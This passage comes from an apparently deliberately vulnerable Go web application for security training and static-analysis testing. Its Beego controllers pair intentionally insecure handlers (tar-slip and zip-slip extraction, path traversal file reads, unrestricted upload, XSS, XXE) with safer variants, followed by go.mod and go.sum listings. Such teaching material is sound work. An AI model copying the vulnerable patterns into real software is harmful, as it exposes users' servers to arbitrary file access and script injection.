 66 | 			err := os.MkdirAll(destDirPath+"/"+path.Dir(hdr.Name), os.ModePerm)
 67 | 			if err != nil {
 68 | 				return err
 69 | 			}
 70 | 			// Write data to file
 71 | 			fmt.Println(hdr.Name)
 72 | 			fw, _ := os.Create(destDirPath + "/" + hdr.Name)
 73 | 			if err != nil {
 74 | 				return err
 75 | 			}
 76 | 			_, err = io.Copy(fw, tr)
 77 | 			if err != nil {
 78 | 				return err
 79 | 			}
 80 | 		}
 81 | 	}
 82 | 	return nil
 83 | }
 84 | 
 85 | func (c *TarSlipVuln1Controller) Post() {
 86 | 	_, h, err := c.GetFile("file")
 87 | 	if err != nil {
 88 | 		panic(err)
 89 | 	}
 90 | 	savePath := "static/upload/" + h.Filename
 91 | 	c.SaveToFile("file", savePath)
 92 | 	untarPath := "static/untar/" + h.Filename
 93 | 	err = DeCompressTar(savePath, "static/untar/")
 94 | 	if err != nil {
 95 | 		panic(err)
 96 | 	}
 97 | 	//c.Data["savePath"] = untarPath
 98 | 	//c.TplName = "fileUpload.tpl"
 99 | 	//file, err := os.Open(savePath)
100 | 	//defer file.Close()
101 | 	//tarReader := tar.NewReader(file)
102 | 	//header, _ := tarReader.Next()
103 | 	//os.MkdirAll(path.Dir(header.Name), 0755) // NOT OK
104 | 	c.Data["savePath"] = untarPath
105 | 	c.TplName = "fileUpload.tpl"
106 | }
107 | 


--------------------------------------------------------------------------------
/controllers/traversal.go:
--------------------------------------------------------------------------------
 1 | package controllers
 2 | 
 3 | import (
 4 | 	"go-sec-code/utils"
 5 | 	"io/ioutil"
 6 | 	"os"
 7 | 	"path/filepath"
 8 | 	"strings"
 9 | 
10 | 	beego "github.com/beego/beego/v2/server/web"
11 | )
12 | 
13 | type PathTraversalVuln1Controller struct {
14 | 	beego.Controller
15 | }
16 | 
17 | type PathTraversalVuln2Controller struct {
18 | 	beego.Controller
19 | }
20 | 
21 | type PathTraversalVuln3Controller struct {
22 | 	beego.Controller
23 | }
24 | 
25 | type PathTraversalSafe1Controller struct {
26 | 	beego.Controller
27 | }
28 | 
29 | type PathTraversalSafe2Controller struct {
30 | 	beego.Controller
31 | }
32 | 
33 | func (c *PathTraversalVuln1Controller) Get() {
34 | 	file := c.GetString("file")
35 | 	output, err := ioutil.ReadFile(file)
36 | 	if err != nil {
37 | 		panic(err)
38 | 	}
39 | 	c.Ctx.ResponseWriter.Write(output)
40 | }
41 | 
42 | func (c *PathTraversalVuln2Controller) Get() {
43 | 	file := c.GetString("file")
44 | 	file = filepath.Clean(file)
45 | 	output, err := ioutil.ReadFile(file)
46 | 	if err != nil {
47 | 		panic(err)
48 | 	}
49 | 	c.Ctx.ResponseWriter.Write(output)
50 | }
51 | 
52 | func (c *PathTraversalVuln3Controller) Get() {
53 | 	filePath := c.GetString("file")
54 | 	filePath = filepath.Clean(filePath)
55 | 	filePath = filepath.Join("./", filePath)
56 | 	openFile, err := os.Open(filePath)
57 | 	if err != nil {
58 | 		c.Ctx.ResponseWriter.Write([]byte("error"))
59 | 	}
60 | 	b := make([]byte, 10000)
61 | 	_, err = openFile.Read(b)
62 | 	_, err = c.Ctx.ResponseWriter.Write(b)
63 | }
64 | 
65 | func (c *PathTraversalSafe1Controller) Get() {
66 | 	file := c.GetString("file")
67 | 	pathTraversalFilter := utils.PathTraversalFilter{}
68 | 	if pathTraversalFilter.DoFilter(file) {
69 | 		c.Ctx.ResponseWriter.Write([]byte("evil input"))
70 | 	} else {
71 | 		output, err := ioutil.ReadFile("static/" + file)
72 | 		if err != nil {
73 | 			panic(err)
74 | 		}
75 | 		c.Ctx.ResponseWriter.Write(output)
76 | 	}
77 | }
78 | 
79 | func (c *PathTraversalSafe2Controller) Get() {
80 | 	file := c.GetString("file")
81 | 	file = filepath.Join("static/", file)
82 | 	if !strings.HasPrefix(file, "static/") {
83 | 		c.Ctx.ResponseWriter.Write([]byte("evil input"))
84 | 	} else {
85 | 		output, err := ioutil.ReadFile(file)
86 | 		if err != nil {
87 | 			panic(err)
88 | 		}
89 | 		c.Ctx.ResponseWriter.Write(output)
90 | 	}
91 | }
92 | 


--------------------------------------------------------------------------------
/controllers/upload.go:
--------------------------------------------------------------------------------
 1 | package controllers
 2 | 
 3 | import (
 4 | 	"fmt"
 5 | 	"go-sec-code/utils"
 6 | 	"time"
 7 | 
 8 | 	beego "github.com/beego/beego/v2/server/web"
 9 | )
10 | 
11 | type FileUploadVuln1Controller struct {
12 | 	beego.Controller
13 | }
14 | 
15 | type FileUploadSafe1Controller struct {
16 | 	beego.Controller
17 | }
18 | 
19 | func (c *FileUploadVuln1Controller) Get() {
20 | 	c.TplName = "fileUpload.tpl"
21 | }
22 | 
23 | func (c *FileUploadVuln1Controller) Post() {
24 | 	userid := c.GetString("userid")
25 | 	_, h, err := c.GetFile("file")
26 | 	if err != nil {
27 | 		panic(err)
28 | 	}
29 | 	savePath := "static/upload/" + userid + fmt.Sprint(time.Now().Unix()) + h.Filename
30 | 	c.SaveToFile("file", savePath)
31 | 	c.Data["savePath"] = savePath
32 | 	c.TplName = "fileUpload.tpl"
33 | }
34 | 
35 | func (c *FileUploadSafe1Controller) Get() {
36 | 	c.TplName = "fileUpload.tpl"
37 | }
38 | 
39 | func (c *FileUploadSafe1Controller) Post() {
40 | 	userid := c.GetString("userid")
41 | 	fileUploadFilter := utils.FileUploadFilter{}
42 | 	evil := fileUploadFilter.DoFilter(userid)
43 | 	if evil == true {
44 | 		c.Ctx.ResponseWriter.Write([]byte("evil input"))
45 | 		return
46 | 	}
47 | 	_, h, err := c.GetFile("file")
48 | 	if err != nil {
49 | 		panic(err)
50 | 	}
51 | 	savePath := "static/upload/" + userid + fmt.Sprint(time.Now().Unix()) + h.Filename
52 | 	c.SaveToFile("file", savePath)
53 | 	c.Data["savePath"] = savePath
54 | 	c.TplName = "fileUpload.tpl"
55 | }
56 | 


--------------------------------------------------------------------------------
/controllers/xss.go:
--------------------------------------------------------------------------------
 1 | package controllers
 2 | 
 3 | import (
 4 | 	"go-sec-code/utils"
 5 | 	"html/template"
 6 | 	"io/ioutil"
 7 | 
 8 | 	beego "github.com/beego/beego/v2/server/web"
 9 | )
10 | 
11 | type XSSVuln1Controller struct {
12 | 	beego.Controller
13 | }
14 | 
15 | type XSSVuln2Controller struct {
16 | 	beego.Controller
17 | }
18 | 
19 | type XSSVuln3Controller struct {
20 | 	beego.Controller
21 | }
22 | 
23 | type XSSVuln4Controller struct {
24 | 	beego.Controller
25 | }
26 | 
27 | type XSSSafe1Controller struct {
28 | 	beego.Controller
29 | }
30 | 
31 | type XSSSafe2Controller struct {
32 | 	beego.Controller
33 | }
34 | 
35 | func (c *XSSVuln1Controller) Get() {
36 | 	xss := c.GetString("xss", "hello")
37 | 	c.Ctx.ResponseWriter.Header().Set("Content-Type", "text/html")
38 | 	c.Ctx.ResponseWriter.Write([]byte(xss))
39 | }
40 | 
41 | func (c *XSSVuln2Controller) Get() {
42 | 	xss := c.GetSession("xss")
43 | 	if xss == nil {
44 | 		xss = "hello"
45 | 	}
46 | 	c.Data["xss"] = template.HTML(xss.(string))
47 | 	c.TplName = "xss.tpl"
48 | }
49 | 
50 | func (c *XSSVuln3Controller) Get() {
51 | 	file, err := ioutil.ReadFile("static/xss/poc.svg")
52 | 	if err != nil {
53 | 		panic(err)
54 | 	}
55 | 	c.Ctx.ResponseWriter.Write(file)
56 | }
57 | 
58 | func (c *XSSVuln4Controller) Get() {
59 | 	file, err := ioutil.ReadFile("static/xss/poc.pdf")
60 | 	if err != nil {
61 | 		panic(err)
62 | 	}
63 | 	c.Ctx.ResponseWriter.Header().Set("Content-Security-Policy", `default-src 'self';`)
64 | 	c.Ctx.ResponseWriter.Write(file)
65 | }
66 | 
67 | func (c *XSSVuln2Controller) Post() {
68 | 	xss := c.GetString("xss", "hello")
69 | 	c.SetSession("xss", xss)
70 | 	c.Data["xss"] = template.HTML(xss)
71 | 	c.TplName = "xss.tpl"
72 | }
73 | 
74 | func (c *XSSSafe1Controller) Get() {
75 | 	xss := c.GetString("xss", "hello")
76 | 	xssFilter := utils.XSSFilter{}
77 | 	xss = xssFilter.DoFilter(xss)
78 | 	c.Ctx.ResponseWriter.Header().Set("Content-Type", "text/html")
79 | 	c.Ctx.ResponseWriter.Write([]byte(xss))
80 | }
81 | 
82 | func (c *XSSSafe2Controller) Get() {
83 | 	file, err := ioutil.ReadFile("static/xss/poc.svg")
84 | 	if err != nil {
85 | 		panic(err)
86 | 	}
87 | 	c.Ctx.ResponseWriter.Header().Set("Content-Security-Policy", `default-src 'self';`)
88 | 	c.Ctx.ResponseWriter.Write(file)
89 | }
90 | 


--------------------------------------------------------------------------------
/controllers/xxe.go:
--------------------------------------------------------------------------------
 1 | package controllers
 2 | 
 3 | import (
 4 | 	"fmt"
 5 | 	"io/ioutil"
 6 | 
 7 | 	beego "github.com/beego/beego/v2/server/web"
 8 | 	"github.com/beevik/etree"
 9 | 	//"github.com/lestrrat-go/libxml2/parser"
10 | )
11 | 
12 | type XXEVuln1Controller struct {
13 | 	beego.Controller
14 | }
15 | 
16 | type XXEVuln2Controller struct {
17 | 	beego.Controller
18 | }
19 | 
20 | type XXESafe1Controller struct {
21 | 	beego.Controller
22 | }
23 | 
24 | func (c *XXEVuln1Controller) Get() {
25 | 	file, err := ioutil.ReadFile("static/xml/xxe.xml")
26 | 	if err != nil {
27 | 		panic(err)
28 | 	}
29 | 	c.Data["xxe"] = string(file)
30 | 	c.TplName = "xxe.tpl"
31 | }
32 | 
33 | //func (c *XXEVuln1Controller) Post() {
34 | //	file := c.GetString("file")
35 | //	p := parser.New(parser.XMLParseNoEnt)
36 | //	doc, err := p.ParseReader(bytes.NewReader([]byte(file)))
37 | //	if err != nil {
38 | //		panic(err)
39 | //	}
40 | //	defer doc.Free()
41 | //	root, err := doc.DocumentElement()
42 | //	xxe := root.TextContent()
43 | //	c.Data["xxe"] = xxe
44 | //	c.TplName = "xxe.tpl"
45 | //}
46 | 
47 | func (c *XXESafe1Controller) Get() {
48 | 	file, err := ioutil.ReadFile("static/xml/xxe.xml")
49 | 	if err != nil {
50 | 		panic(err)
51 | 	}
52 | 	c.Data["xxe"] = string(file)
53 | 	c.TplName = "xxe.tpl"
54 | }
55 | 
56 | func (c *XXESafe1Controller) Post() {
57 | 	file := c.GetString("file")
58 | 	err := ioutil.WriteFile("tmp/upload.xml", []byte(file), 0777)
59 | 	if err != nil {
60 | 		panic(err)
61 | 	}
62 | 	entityMap := make(map[string]string)
63 | 	entityMap["xxe"] = "default xxe value"
64 | 	doc := etree.NewDocument()
65 | 	doc.ReadSettings.Entity = entityMap
66 | 	if err := doc.ReadFromFile("tmp/upload.xml"); err != nil {
67 | 		fmt.Println(err)
68 | 	}
69 | 	xxe := doc.SelectElement("root").Text()
70 | 	c.Data["xxe"] = xxe
71 | 	c.TplName = "xxe.tpl"
72 | }
73 | 


--------------------------------------------------------------------------------
/controllers/zipslip.go:
--------------------------------------------------------------------------------
  1 | package controllers
  2 | 
  3 | import (
  4 | 	"archive/zip"
  5 | 	beego "github.com/beego/beego/v2/server/web"
  6 | 	"io"
  7 | 	"os"
  8 | 	"path/filepath"
  9 | 	"strings"
 10 | )
 11 | 
 12 | func checkPathBool(p string) bool {
 13 | 	return strings.Contains(filepath.Clean(p), "..")
 14 | }
 15 | 
 16 | type ZipSlipVuln1Controller struct {
 17 | 	beego.Controller
 18 | }
 19 | 
 20 | func (c *ZipSlipVuln1Controller) Get() {
 21 | 	c.TplName = "fileUpload.tpl"
 22 | }
 23 | 
 24 | func (c *ZipSlipVuln1Controller) Post() {
 25 | 	_, h, err := c.GetFile("file")
 26 | 	if err != nil {
 27 | 		panic(err)
 28 | 	}
 29 | 	//timestamp := fmt.Sprint(time.Now().Unix())
 30 | 	savePath := "static/upload/" + h.Filename
 31 | 	c.SaveToFile("file", savePath)
 32 | 	unzipPath := "static/unzip/" + h.Filename
 33 | 	r, err := zip.OpenReader(savePath)
 34 | 	if err != nil {
 35 | 		panic(err)
 36 | 	}
 37 | 	for _, f := range r.File {
 38 | 		fpath := filepath.Join(unzipPath, f.Name)
 39 | 		if f.FileInfo().IsDir() {
 40 | 			// Make Folder
 41 | 			os.MkdirAll(fpath, os.ModePerm)
 42 | 			continue
 43 | 		}
 44 | 
 45 | 		// Make File
 46 | 		if err = os.MkdirAll(filepath.Dir(fpath), os.ModePerm); err != nil {
 47 | 			panic(err)
 48 | 		}
 49 | 
 50 | 		outFile, err := os.OpenFile(fpath, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, f.Mode())
 51 | 		if err != nil {
 52 | 			panic(err)
 53 | 		}
 54 | 
 55 | 		rc, err := f.Open()
 56 | 		if err != nil {
 57 | 			panic(err)
 58 | 		}
 59 | 
 60 | 		_, err = io.Copy(outFile, rc)
 61 | 
 62 | 		// Close the file without defer to close before next iteration of loop
 63 | 		outFile.Close()
 64 | 		rc.Close()
 65 | 
 66 | 		if err != nil {
 67 | 			panic(err)
 68 | 		}
 69 | 	}
 70 | 	c.Data["savePath"] = unzipPath
 71 | 	c.TplName = "fileUpload.tpl"
 72 | }
 73 | 
 74 | //// https://security.snyk.io/research/zip-slip-vulnerability
 75 | //func isRelGood(candidate, target string) bool {
 76 | //	// GOOD: resolves all symbolic links before checking
 77 | //	// that `candidate` does not escape from `target`
 78 | //	if filepath.IsAbs(candidate) {
 79 | //		return false
 80 | //	}
 81 | //	realpath, err := filepath.EvalSymlinks(filepath.Join(target, candidate))
 82 | //	if err != nil {
 83 | //		return false
 84 | //	}
 85 | //	relpath, err := filepath.Rel(target, realpath)
 86 | //	return err == nil && !strings.HasPrefix(filepath.Clean(relpath), "..")
 87 | //}
 88 | //
 89 | //func isRel(candidate, target string) bool {
 90 | //	if filepath.IsAbs(candidate) {
 91 | //		return false
 92 | //	}
 93 | //	relpath, err := filepath.Rel(target, filepath.Join(target, candidate))
 94 | //	return err == nil && !strings.HasPrefix(filepath.Clean(relpath), "..")
 95 | //}
 96 | //
 97 | //func unzipSymlinkBadTar(f io.Reader, target string) {
 98 | //	r := tar.NewReader(f)
 99 | //	for {
100 | //		header, err := r.Next()
101 | //		if err != nil {
102 | //			break
103 | //		}
104 | //		if isRel(header.Linkname, target) && isRel(header.Name, target) {
105 | //			os.Symlink(header.Linkname, header.Name)
106 | //		}
107 | //	}
108 | //}
109 | //
110 | //func unzipSymlinkBadZip(f io.ReaderAt, target string) {
111 | //	r, _ := zip.NewReader(f, 100)
112 | //	for _, header := range r.File {
113 | //		linkData, _ := header.Open()
114 | //		linkNameBytes, _ := ioutil.ReadAll(linkData)
115 | //		linkName := string(linkNameBytes)
116 | //		if isRel(linkName, target) && isRel(header.Name, target) {
117 | //			os.Symlink(linkName, header.Name)
118 | //		}
119 | //	}
120 | //}
121 | 


--------------------------------------------------------------------------------
/favicon.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pricklyglobe/GoSecCode-codeql/24bc3df3f6ff118e9c8a5537869ef482b736ce35/favicon.ico


--------------------------------------------------------------------------------
/go-sec-code.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pricklyglobe/GoSecCode-codeql/24bc3df3f6ff118e9c8a5537869ef482b736ce35/go-sec-code.png


--------------------------------------------------------------------------------
/go.mod:
--------------------------------------------------------------------------------
  1 | module go-sec-code
  2 | 
  3 | go 1.21
  4 | 
  5 | toolchain go1.22.2
  6 | 
  7 | require (
  8 | 	github.com/Masterminds/sprig v2.22.0+incompatible
  9 | 	github.com/Masterminds/squirrel v1.5.3
 10 | 	github.com/beego/beego/v2 v2.1.6
 11 | 	github.com/beevik/etree v1.3.0
 12 | 	github.com/codeskyblue/go-sh v0.0.0-20200712050446-30169cf553fe
 13 | 	github.com/cokeBeer/goot v0.0.33
 14 | 	github.com/go-sql-driver/mysql v1.7.1
 15 | 	github.com/gogf/gf v1.16.9
 16 | 	github.com/gorilla/websocket v1.4.2
 17 | 	github.com/jinzhu/gorm v1.9.16
 18 | 	github.com/jmoiron/sqlx v1.3.5
 19 | 	github.com/lestrrat-go/libxml2 v0.0.0-20240328005548-52975fd1a01c
 20 | 	github.com/robertkrimen/otto v0.3.0
 21 | 	github.com/uptrace/bun v1.1.17
 22 | 	github.com/uptrace/bun/dialect/mysqldialect v1.1.17
 23 | 	go.mongodb.org/mongo-driver v1.14.0
 24 | 	golang.org/x/crypto v0.21.0
 25 | 	golang.org/x/net v0.22.0
 26 | 	nhooyr.io/websocket v1.8.10
 27 | 	xorm.io/xorm v1.3.0
 28 | )
 29 | 
 30 | require (
 31 | 	github.com/BurntSushi/toml v0.3.1 // indirect
 32 | 	github.com/Masterminds/goutils v1.1.1 // indirect
 33 | 	github.com/Masterminds/semver v1.5.0 // indirect
 34 | 	github.com/beorn7/perks v1.0.1 // indirect
 35 | 	github.com/cespare/xxhash/v2 v2.2.0 // indirect
 36 | 	github.com/clbanning/mxj v1.8.5-0.20200714211355-ff02cfb8ea28 // indirect
 37 | 	github.com/codegangsta/inject v0.0.0-20150114235600-33e0aa1cb7c0 // indirect
 38 | 	github.com/davecgh/go-spew v1.1.2-0.20180830191138-d8f796af33cc // indirect
 39 | 	github.com/dnote/color v1.7.0 // indirect
 40 | 	github.com/dustin/go-humanize v1.0.1 // indirect
 41 | 	github.com/fatih/color v1.13.0 // indirect
 42 | 	github.com/fsnotify/fsnotify v1.7.0 // indirect
 43 | 	github.com/go-logr/logr v1.2.3 // indirect
 44 | 	github.com/go-logr/stdr v1.2.2 // indirect
 45 | 	github.com/goccy/go-json v0.9.11 // indirect
 46 | 	github.com/golang/protobuf v1.5.3 // indirect
 47 | 	github.com/golang/snappy v0.0.4 // indirect
 48 | 	github.com/gomodule/redigo v2.0.0+incompatible // indirect
 49 | 	github.com/google/go-cmp v0.6.0 // indirect
 50 | 	github.com/google/uuid v1.4.0 // indirect
 51 | 	github.com/grokify/html-strip-tags-go v0.0.1 // indirect
 52 | 	github.com/hashicorp/golang-lru v1.0.2 // indirect
 53 | 	github.com/huandu/xstrings v1.3.2 // indirect
 54 | 	github.com/imdario/mergo v0.3.12 // indirect
 55 | 	github.com/jinzhu/inflection v1.0.0 // indirect
 56 | 	github.com/json-iterator/go v1.1.12 // indirect
 57 | 	github.com/klauspost/compress v1.14.4 // indirect
 58 | 	github.com/kr/text v0.2.0 // indirect
 59 | 	github.com/lann/builder v0.0.0-20180802200727-47ae307949d0 // indirect
 60 | 	github.com/lann/ps v0.0.0-20150810152359-62de8c46ede0 // indirect
 61 | 	github.com/lib/pq v1.10.9 // indirect
 62 | 	github.com/mattn/go-colorable v0.1.13 // indirect
 63 | 	github.com/mattn/go-isatty v0.0.20 // indirect
 64 | 	github.com/mattn/go-runewidth v0.0.9 // indirect
 65 | 	github.com/mattn/go-sqlite3 v2.0.3+incompatible // indirect
 66 | 	github.com/matttproud/golang_protobuf_extensions v1.0.4 // indirect
 67 | 	github.com/mitchellh/copystructure v1.2.0 // indirect
 68 | 	github.com/mitchellh/mapstructure v1.5.0 // indirect
 69 | 	github.com/mitchellh/reflectwalk v1.0.2 // indirect
 70 | 	github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd // indirect
 71 | 	github.com/modern-go/reflect2 v1.0.2 // indirect
 72 | 	github.com/montanaflynn/stats v0.0.0-20171201202039-1bf9dbcd8cbe // indirect
 73 | 	github.com/neo4j/neo4j-go-driver/v4 v4.4.4 // indirect
 74 | 	github.com/olekukonko/tablewriter v0.0.5 // indirect
 75 | 	github.com/pkg/errors v0.9.1 // indirect
 76 | 	github.com/pmezard/go-difflib v1.0.1-0.20181226105442-5d4384ee4fb2 // indirect
 77 | 	github.com/prometheus/client_golang v1.16.0 // indirect
 78 | 	github.com/prometheus/client_model v0.4.0 // indirect
 79 | 	github.com/prometheus/common v0.42.0 // indirect
 80 | 	github.com/prometheus/procfs v0.10.1 // indirect
 81 | 	github.com/remyoudompheng/bigfft v0.0.0-20230129092748-24d4a6f8daec // indirect
 82 | 	github.com/shiena/ansicolor v0.0.0-20200904210342-c7312218db18 // indirect
 83 | 	github.com/syndtr/goleveldb v1.0.0 // indirect
 84 | 	github.com/tmthrgd/go-hex v0.0.0-20190904060850-447a3041c3bc // indirect
 85 | 	github.com/valyala/bytebufferpool v1.0.0 // indirect
 86 | 	github.com/vmihailenco/msgpack/v5 v5.4.1 // indirect
 87 | 	github.com/vmihailenco/tagparser/v2 v2.0.0 // indirect
 88 | 	github.com/xdg-go/pbkdf2 v1.0.0 // indirect
 89 | 	github.com/xdg-go/scram v1.1.2 // indirect
 90 | 	github.com/xdg-go/stringprep v1.0.4 // indirect
 91 | 	github.com/youmark/pkcs8 v0.0.0-20181117223130-1be2e3e5546d // indirect
 92 | 	go.opentelemetry.io/otel v1.11.2 // indirect
 93 | 	go.opentelemetry.io/otel/trace v1.11.2 // indirect
 94 | 	golang.org/x/mod v0.15.0 // indirect
 95 | 	golang.org/x/sync v0.6.0 // indirect
 96 | 	golang.org/x/sys v0.18.0 // indirect
 97 | 	golang.org/x/text v0.14.0 // indirect
 98 | 	golang.org/x/tools v0.18.0 // indirect
 99 | 	golang.org/x/tools/go/pointer v0.1.0-deprecated // indirect
100 | 	google.golang.org/protobuf v1.31.0 // indirect
101 | 	gopkg.in/sourcemap.v1 v1.0.5 // indirect
102 | 	gopkg.in/yaml.v3 v3.0.1 // indirect
103 | 	modernc.org/ccgo/v3 v3.16.13 // indirect
104 | 	modernc.org/libc v1.22.2 // indirect
105 | 	modernc.org/memory v1.5.0 // indirect
106 | 	modernc.org/sqlite v1.18.2 // indirect
107 | 	modernc.org/token v1.1.0 // indirect
108 | 	xorm.io/builder v0.3.9 // indirect
109 | )
110 | 


--------------------------------------------------------------------------------
/go.sum:
--------------------------------------------------------------------------------
  1 | cloud.google.com/go v0.26.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw=
  2 | cloud.google.com/go v0.34.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw=
  3 | gitea.com/xorm/sqlfiddle v0.0.0-20180821085327-62ce714f951a h1:lSA0F4e9A2NcQSqGqTOXqu2aRi/XEQxDCBwM8yJtE6s=
  4 | gitea.com/xorm/sqlfiddle v0.0.0-20180821085327-62ce714f951a/go.mod h1:EXuID2Zs0pAQhH8yz+DNjUbjppKQzKFAn28TMYPB6IU=
  5 | gitee.com/travelliu/dm v1.8.11192/go.mod h1:DHTzyhCrM843x9VdKVbZ+GKXGRbKM2sJ4LxihRxShkE=
  6 | github.com/BurntSushi/toml v0.3.1 h1:WXkYYl6Yr3qBf1K79EBnL4mak0OimBfB0XUf9Vl28OQ=
  7 | github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU=
  8 | github.com/Knetic/govaluate v3.0.1-0.20171022003610-9aa49832a739+incompatible/go.mod h1:r7JcOSlj0wfOMncg0iLm8Leh48TZaKVeNIfJntJ2wa0=
  9 | github.com/Masterminds/goutils v1.1.1 h1:5nUrii3FMTL5diU80unEVvNevw1nH4+ZV4DSLVJLSYI=
 10 | github.com/Masterminds/goutils v1.1.1/go.mod h1:8cTjp+g8YejhMuvIA5y2vz3BpJxksy863GQaJW2MFNU=
 11 | github.com/Masterminds/semver v1.5.0 h1:H65muMkzWKEuNDnfl9d70GUjFniHKHRbFPGBuZ3QEww=
 12 | github.com/Masterminds/semver v1.5.0/go.mod h1:MB6lktGJrhw8PrUyiEoblNEGEQ+RzHPF078ddwwvV3Y=
 13 | github.com/Masterminds/semver/v3 v3.1.1/go.mod h1:VPu/7SZ7ePZ3QOrcuXROw5FAcLl4a0cBrbBpGY/8hQs=
 14 | github.com/Masterminds/sprig v2.22.0+incompatible h1:z4yfnGrZ7netVz+0EDJ0Wi+5VZCSYp4Z0m2dk6cEM60=
 15 | github.com/Masterminds/sprig v2.22.0+incompatible/go.mod h1:y6hNFY5UBTIWBxnzTeuNhlNS5hqE0NB0E6fgfo2Br3o=
 16 | github.com/Masterminds/squirrel v1.5.3 h1:YPpoceAcxuzIljlr5iWpNKaql7hLeG1KLSrhvdHpkZc=
 17 | github.com/Masterminds/squirrel v1.5.3/go.mod h1:NNaOrjSoIDfDA40n7sr2tPNZRfjzjA400rg+riTZj10=
 18 | github.com/PuerkitoBio/goquery v1.5.1/go.mod h1:GsLWisAFVj4WgDibEWF4pvYnkVQBpKBKeU+7zCJoLcc=
 19 | github.com/Shopify/sarama v1.19.0/go.mod h1:FVkBWblsNy7DGZRfXLU0O9RCGt5g3g3yEuWXgklEdEo=
 20 | github.com/Shopify/toxiproxy v2.1.4+incompatible/go.mod h1:OXgGpZ6Cli1/URJOF1DMxUHB2q5Ap20/P/eIdh4G0pI=
 21 | github.com/VividCortex/gohistogram v1.0.0/go.mod h1:Pf5mBqqDxYaXu3hDrrU+w6nw50o/4+TcAqDqk/vUH7g=
 22 | github.com/afex/hystrix-go v0.0.0-20180502004556-fa1af6a1f4f5/go.mod h1:SkGFH1ia65gfNATL8TAiHDNxPzPdmEL5uirI2Uyuz6c=
 23 | github.com/alecthomas/template v0.0.0-20160405071501-a0175ee3bccc/go.mod h1:LOuyumcjzFXgccqObfd/Ljyb9UuFJ6TxHnclSeseNhc=
 24 | github.com/alecthomas/template v0.0.0-20190718012654-fb15b899a751/go.mod h1:LOuyumcjzFXgccqObfd/Ljyb9UuFJ6TxHnclSeseNhc=
 25 | github.com/alecthomas/units v0.0.0-20151022065526-2efee857e7cf/go.mod h1:ybxpYRFXyAe+OPACYpWeL0wqObRcbAqCMya13uyzqw0=
 26 | github.com/alecthomas/units v0.0.0-20190717042225-c3de453c63f4/go.mod h1:ybxpYRFXyAe+OPACYpWeL0wqObRcbAqCMya13uyzqw0=
 27 | github.com/andybalholm/cascadia v1.1.0/go.mod h1:GsXiBklL0woXo1j/WYWtSYYC4ouU9PqHO0sqidkEA4Y=
 28 | github.com/apache/thrift v0.12.0/go.mod h1:cp2SuWMxlEZw2r+iP2GNCdIi4C1qmUzdZFSVb+bacwQ=
 29 | github.com/apache/thrift v0.13.0/go.mod h1:cp2SuWMxlEZw2r+iP2GNCdIi4C1qmUzdZFSVb+bacwQ=
 30 | github.com/armon/circbuf v0.0.0-20150827004946-bbbad097214e/go.mod h1:3U/XgcO3hCbHZ8TKRvWD2dDTCfh9M9ya+I9JpbB7O8o=
 31 | github.com/armon/go-metrics v0.0.0-20180917152333-f0300d1749da/go.mod h1:Q73ZrmVTwzkszR9V5SSuryQ31EELlFMUz1kKyl939pY=
 32 | github.com/armon/go-radix v0.0.0-20180808171621-7fddfc383310/go.mod h1:ufUuZ+zHj4x4TnLV4JWEpy2hxWSpsRywHrMgIH9cCH8=
 33 | github.com/aryann/difflib v0.0.0-20170710044230-e206f873d14a/go.mod h1:DAHtR1m6lCRdSC2Tm3DSWRPvIPr6xNKyeHdqDQSQT+A=
 34 | github.com/aws/aws-lambda-go v1.13.3/go.mod h1:4UKl9IzQMoD+QF79YdCuzCwp8VbmG4VAQwij/eHl5CU=
 35 | github.com/aws/aws-sdk-go v1.27.0/go.mod h1:KmX6BPdI08NWTb3/sm4ZGu5ShLoqVDhKgpiN924inxo=
 36 | github.com/aws/aws-sdk-go-v2 v0.18.0/go.mod h1:JWVYvqSMppoMJC0x5wdwiImzgXTI9FuZwxzkQq9wy+g=
 37 | github.com/beego/beego/v2 v2.1.6 h1:ny2WqvtpG1gAkEqJ9PQrOz6ZcQvVBJK+dECDOd/heIM=
 38 | github.com/beego/beego/v2 v2.1.6/go.mod h1:kFJvA21OjBwixXKx7BeH+Ug492Pp+h4cORHFTf1L8e0=
 39 | github.com/beevik/etree v1.3.0 h1:hQTc+pylzIKDb23yYprodCWWTt+ojFfUZyzU09a/hmU=
 40 | github.com/beevik/etree v1.3.0/go.mod h1:aiPf89g/1k3AShMVAzriilpcE4R/Vuor90y83zVZWFc=
 41 | github.com/beorn7/perks v0.0.0-20180321164747-3a771d992973/go.mod h1:Dwedo/Wpr24TaqPxmxbtue+5NUziq4I4S80YR8gNf3Q=
 42 | github.com/beorn7/perks v1.0.0/go.mod h1:KWe93zE9D1o94FZ5RNwFwVgaQK1VOXiVxmqh+CedLV8=
 43 | github.com/beorn7/perks v1.0.1 h1:VlbKKnNfV8bJzeqoa4cOKqO6bYr3WgKZxO8Z16+hsOM=
 44 | github.com/beorn7/perks v1.0.1/go.mod h1:G2ZrVWU2WbWT9wwq4/hrbKbnv/1ERSJQ0ibhJ6rlkpw=
 45 | github.com/bgentry/speakeasy v0.1.0/go.mod h1:+zsyZBPWlz7T6j88CTgSN5bM796AkVf0kBD4zp0CCIs=
 46 | github.com/casbin/casbin/v2 v2.1.2/go.mod h1:YcPU1XXisHhLzuxH9coDNf2FbKpjGlbCg3n9yuLkIJQ=
 47 | github.com/cenkalti/backoff v2.2.1+incompatible/go.mod h1:90ReRw6GdpyfrHakVjL/QHaoyV4aDUVVkXQJJJ3NXXM=
 48 | github.com/census-instrumentation/opencensus-proto v0.2.1/go.mod h1:f6KPmirojxKA12rnyqOA5BBL4O983OfeGPqjHWSTneU=
 49 | github.com/cespare/xxhash/v2 v2.1.1/go.mod h1:VGX0DQ3Q6kWi7AoAeZDth3/j3BFtOZR5XLFGgcrjCOs=
 50 | github.com/cespare/xxhash/v2 v2.2.0 h1:DC2CZ1Ep5Y4k3ZQ899DldepgrayRUGE6BBZ/cd9Cj44=
 51 | github.com/cespare/xxhash/v2 v2.2.0/go.mod h1:VGX0DQ3Q6kWi7AoAeZDth3/j3BFtOZR5XLFGgcrjCOs=
